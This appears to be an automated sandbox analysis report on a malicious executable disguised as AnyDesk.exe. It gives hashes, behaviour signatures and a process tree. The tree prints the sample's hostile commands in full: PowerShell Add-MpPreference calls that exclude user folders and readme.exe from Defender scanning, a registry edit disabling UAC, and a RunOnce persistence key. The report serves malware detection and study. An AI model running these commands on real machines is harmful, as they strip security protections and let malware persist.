Analysis
-
max time kernel
151s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2023 14:49
Behavioral task
behavioral1
Sample
AnyDesk.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
AnyDesk.exe
Resource
win10v2004-20221111-en
General
-
Target
AnyDesk.exe
-
Size
1024.0MB
-
MD5
eaad183f45933c9a0555faa8fc11ad18
-
SHA1
18f60cb6fc480c630ebb7840a0ce221204c1a35d
-
SHA256
001089c78854b89c19d1636239e822160f1e84d3ffd1f60d59907e075c71c7a0
-
SHA512
4b8c93e501a1be9d1b819089d6e7fb5b29c9b355acb2b9018b19cf5e675b5d3c3630ac861a4a2ad576984cce48d5e5c651d431b18d60decce6837fa6fa720791
-
SSDEEP
393216:yqvNmrbQZmAPE6a2/vVyBTVKc7c85j4euNCb/9rEaQWwdKmleIw6v0vo:X8A8l2/oWcI8j4euC/dEaPwdKmAIxvM
Malware Config
Signatures
-
Processes:
AnyDesk.exeConhost.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" AnyDesk.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Conhost.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
Conhost.exeAnyDesk.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\readme = "C:\\Users\\Public\\readme.exe" Conhost.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce AnyDesk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\readme = "C:\\Users\\Public\\readme.exe" AnyDesk.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Conhost.exe -
Processes:
AnyDesk.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" AnyDesk.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA AnyDesk.exe -
Suspicious behavior: EnumeratesProcesses 30 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4976 powershell.exe 4976 powershell.exe 3576 powershell.exe 3576 powershell.exe 3648 powershell.exe 3648 powershell.exe 4472 powershell.exe 4472 powershell.exe 428 powershell.exe 428 powershell.exe 3708 3708 1644 powershell.exe 1644 powershell.exe 3652 powershell.exe 3652 powershell.exe 1092 powershell.exe 1092 powershell.exe 4076 powershell.exe 4076 powershell.exe 4472 powershell.exe 3576 powershell.exe 4976 powershell.exe 3708 428 powershell.exe 1644 powershell.exe 3648 powershell.exe 1092 powershell.exe 3652 powershell.exe 4076 powershell.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4976 powershell.exe Token: SeDebugPrivilege 3576 powershell.exe Token: SeDebugPrivilege 4076 powershell.exe Token: SeDebugPrivilege 3652 powershell.exe Token: SeDebugPrivilege 4472 powershell.exe Token: SeDebugPrivilege 1644 powershell.exe Token: SeDebugPrivilege 3708 Token: SeDebugPrivilege 3648 powershell.exe Token: SeDebugPrivilege 1092 powershell.exe Token: SeDebugPrivilege 428 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
AnyDesk.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exeConhost.exedescription pid process target process PID 376 wrote to memory of 616 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 616 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 616 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 808 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 808 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 808 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 60 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 60 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 60 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 3956 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 3956 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 3956 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 3500 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 3500 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 3500 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 1052 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 1052 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 1052 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 4928 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 4928 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 4928 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 4820 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 4820 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 4820 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 1028 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 1028 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 1028 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 4588 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 4588 376 AnyDesk.exe cmd.exe PID 376 wrote to memory of 4588 376 AnyDesk.exe cmd.exe PID 808 wrote to memory of 1092 808 cmd.exe powershell.exe PID 808 wrote to memory of 1092 808 cmd.exe powershell.exe PID 808 wrote to memory of 1092 808 cmd.exe powershell.exe PID 4928 wrote to memory of 1644 4928 cmd.exe powershell.exe PID 1028 wrote to memory of 428 1028 cmd.exe powershell.exe PID 4928 wrote to memory of 1644 4928 cmd.exe powershell.exe PID 4928 wrote to memory of 1644 4928 cmd.exe powershell.exe PID 1028 wrote to memory of 428 1028 cmd.exe powershell.exe PID 1028 wrote to memory of 428 1028 cmd.exe powershell.exe PID 1052 wrote to memory of 3576 1052 cmd.exe powershell.exe PID 1052 wrote to memory of 3576 1052 cmd.exe powershell.exe PID 1052 wrote to memory of 3576 1052 cmd.exe powershell.exe PID 4820 wrote to memory of 4976 4820 cmd.exe powershell.exe PID 4820 wrote to memory of 4976 4820 cmd.exe powershell.exe PID 4820 wrote to memory of 4976 4820 cmd.exe powershell.exe PID 3500 wrote to memory of 4076 3500 cmd.exe powershell.exe PID 3500 wrote to memory of 4076 3500 cmd.exe powershell.exe PID 3500 wrote to memory of 4076 3500 cmd.exe powershell.exe PID 3956 wrote to memory of 4472 3956 cmd.exe powershell.exe PID 3956 wrote to memory of 4472 3956 cmd.exe powershell.exe PID 3956 wrote to memory of 4472 3956 cmd.exe powershell.exe PID 616 wrote to memory of 3652 616 cmd.exe powershell.exe PID 616 wrote to memory of 3652 616 cmd.exe powershell.exe PID 616 wrote to memory of 3652 616 cmd.exe powershell.exe PID 60 wrote to memory of 3648 60 cmd.exe powershell.exe PID 60 wrote to memory of 3648 60 cmd.exe powershell.exe PID 60 wrote to memory of 3648 60 cmd.exe powershell.exe PID 4588 wrote to memory of 3708 4588 cmd.exe powershell.exe PID 4588 wrote to memory of 3708 4588 cmd.exe powershell.exe PID 4588 wrote to memory of 3708 4588 cmd.exe powershell.exe PID 3708 wrote to memory of 4284 3708 Conhost.exe PID 3708 wrote to memory of 4284 3708 Conhost.exe PID 3708 wrote to memory of 4284 3708 Conhost.exe PID 4284 wrote to memory of 1812 4284 Conhost.exe cmd.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
AnyDesk.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" AnyDesk.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"1⤵
- UAC bypass
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
- System policy modification
PID:376 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local2⤵
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3652
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads2⤵
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1092
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop2⤵
- Suspicious use of WriteProcessMemory
PID:60 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3648
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4076
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public2⤵
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3576
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents2⤵
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1644
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp2⤵
- Suspicious use of WriteProcessMemory
PID:3956 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4472
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music2⤵
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:428
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe3⤵PID:3708
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"4⤵PID:4284
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local5⤵PID:1812
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local6⤵PID:5320
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads5⤵PID:4744
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads6⤵PID:5332
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop5⤵PID:3540
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop6⤵PID:5364
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public5⤵PID:3100
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public6⤵PID:5380
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents5⤵PID:4824
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents6⤵PID:5372
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads5⤵PID:4556
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads6⤵PID:5388
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music5⤵PID:3432
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music6⤵PID:5396
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe5⤵PID:2832
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe6⤵PID:5612
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"7⤵PID:5832
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads8⤵PID:1816
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads9⤵PID:6504
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop8⤵PID:5196
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop9⤵PID:6572
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local8⤵PID:6012
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local9⤵PID:6380
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp8⤵PID:6116
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp9⤵PID:6552
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe8⤵PID:4724
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- UAC bypass
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4284
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe9⤵PID:6640
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public8⤵PID:1352
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public9⤵PID:6712
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents8⤵PID:5980
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents9⤵PID:6724
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads8⤵PID:5984
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads9⤵PID:6616
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe8⤵PID:5616
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe9⤵PID:6480
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"10⤵PID:5684
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local11⤵PID:1212
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local12⤵PID:6112
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe11⤵PID:724
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe12⤵PID:4428
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"13⤵PID:5432
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe14⤵PID:5332
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe15⤵PID:316
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"16⤵PID:6052
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe17⤵PID:3084
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe18⤵PID:7256
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"19⤵PID:8060
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe20⤵PID:8164
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe21⤵PID:6520
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"22⤵PID:6212
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe23⤵PID:6468
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe24⤵PID:6056
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"25⤵PID:5368
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe26⤵PID:3300
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe27⤵PID:6700
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"28⤵PID:2396
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe29⤵PID:4156
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe30⤵PID:7520
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"31⤵PID:4976
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe32⤵PID:4036
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe33⤵PID:6772
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"34⤵PID:2844
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe35⤵PID:8160
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe36⤵PID:3868
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe35⤵PID:7956
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe36⤵PID:5068
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"37⤵PID:7780
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public38⤵PID:7260
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public39⤵PID:7052
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe38⤵PID:5800
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe39⤵PID:7092
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"40⤵PID:6372
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local41⤵PID:1832
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local42⤵PID:6480
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe41⤵PID:5380
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe42⤵PID:7860
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"43⤵PID:7752
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads44⤵PID:8068
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads45⤵PID:1208
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe44⤵PID:4972
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe45⤵PID:7224
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"46⤵PID:8044
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local47⤵PID:4656
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local48⤵PID:5440
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe47⤵PID:6028
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe48⤵PID:1552
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"49⤵PID:6988
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe50⤵PID:6644
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe51⤵PID:5284
-
C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe"52⤵PID:6100
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell "C:\Users\Admin\AppData\Local\Temp\AnyDesk.exe53⤵PID:7836
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music53⤵PID:4688
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music54⤵PID:2376
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads53⤵PID:6156
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads54⤵PID:6208
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents53⤵PID:6732
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Documents54⤵PID:7552
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public53⤵PID:4084
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe53⤵PID:6724
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Public\readme.exe54⤵PID:4640
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp53⤵PID:8092
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp54⤵PID:4972
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop53⤵PID:5968
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop54⤵PID:1412
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads53⤵PID:3136
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads54⤵PID:5488
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local53⤵PID:3432
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local54⤵PID:4536
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Music50⤵PID:7224
-
